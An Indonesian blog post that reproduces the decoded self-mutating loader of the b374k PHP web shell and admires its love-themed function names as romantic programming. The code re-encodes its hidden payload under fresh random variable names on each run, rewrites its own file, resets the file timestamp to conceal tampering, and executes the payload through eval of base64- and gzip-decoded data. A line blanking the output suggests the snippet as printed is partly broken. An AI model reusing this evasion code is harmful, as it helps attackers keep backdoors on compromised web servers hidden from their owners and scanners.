Dear kawan-kawan…
Kalian pasti sudah pernah
coba shell terupdatenya om ketek, b374k Polymorphic?
Dan kalau sudah punya hasil
decode base 64 nya pasti udah sangat akrab sama script ini:
$x = "x2d60ef22";
$string =
"s7EvyChQSE3OyFdQz85IzCwqVbe2twMA";
$s_pass =
"0de664ecd2be02cdd54234a0d1229b43";
rebirth();
function love($me,$you){
$progress = NULL;
for($kiss = 0; $kiss <
strlen($me); $kiss += strlen($you)){
for($hug = 0; $hug <
strlen($you); $hug++){
$past = (int) ord(substr($me,
$kiss+$hug, 1));
$present = (int)
ord(substr($you, $hug, 1));
$sweet = $past + $present;
$progress .= $sweet .
".";
}
}
return
base64_encode(gzdeflate(rtrim($progress, "."), 9));
}
hate(love($x,$string),$x);
function hate($me,$you){
$progress = NULL;
$problems =
explode(".", gzinflate(base64_decode($me)));
for($mistake = 0; $mistake
< count($problems); $mistake += strlen($you)){
for($hug = 0; $hug <
strlen($you); $hug++){
$past = (int)
$problems[$mistake+$hug];
$present = (int)
ord(substr($you, $hug, 1));
$sweet = $past - $present;
$progress .= chr($sweet);
}
}
return $progress;
}
function make_love(){
$man =
"man.".time().rand(0,50);
$woman =
"woman".time().rand(51,100);
return "x" .
substr(md5($man.$woman),0,8);
}
function rebirth()
{
$parent =
basename($_SERVER['PHP_SELF']);
$egg =
file_get_contents($parent);
$eggdate =
filemtime($parent);
$checkup =
preg_match_all("/\"([^\"]*)\"/", $egg, $eggs);
$egg =
gzinflate(base64_decode($eggs[1][0]));
$get_embrio =
preg_match_all("/\"([^\"]*)\"/", $egg, $eggs);
$adam = $eggs[1][0];
$one = make_love();
$embrio = $eggs[1][1];
$two = make_love();
$eve = $eggs[1][2];
$three = make_love();
$thepass = $eggs[1][3];
$before = hate($adam, $eve);
$after = love($before,
$three);
$child = "\$" .
$one . " = \"" . $after . "\";" .
"\$" . $two .
" = \"" . $embrio . "\";" .
"\$" . $three .
" = \"" . $three . "\";" .
"\$s_pass =
\"" . $thepass ."\";" .
"eval(gzinflate(base64_decode(\$"
. $two . ")));" .
"rebirth();" .
"eval(gzinflate(base64_decode(hate(\$".
$one . ",\$" . $three . "))));";
$child =
base64_encode(gzdeflate($child,9));
$child = "";
highlight_string($child);
if(!$any =
getenv("TMP"))
if(!$any =
getenv("TEMP"))
if(!$any =
getenv("TMPDIR"))
{
if(is_writable("/tmp"))
$any = "/tmp/"; else $any = ".";
}
if(file_put_contents($any .
$three, $child))
{
rename($any . $three ,
$parent);
touch($parent, $eggdate);
if(is_file($any . $three))
unlink($any . $three);
}
}
?>
Kelihatannya romantis ya??
tapi tunggu dulu gak sebatas itu. Nih aku kasih sedikit tafsirannya.
Mengeksplorasi esensi cinta
dalam karya-karya umum banyak dilakukan para penulis sastra, sementara
mengeksplorasi esensi cinta dalam computer programming, sebuah kemahadasyatan
teknologi modern. Makanya salut sekali sama programmer yg bermanuver seperti ini.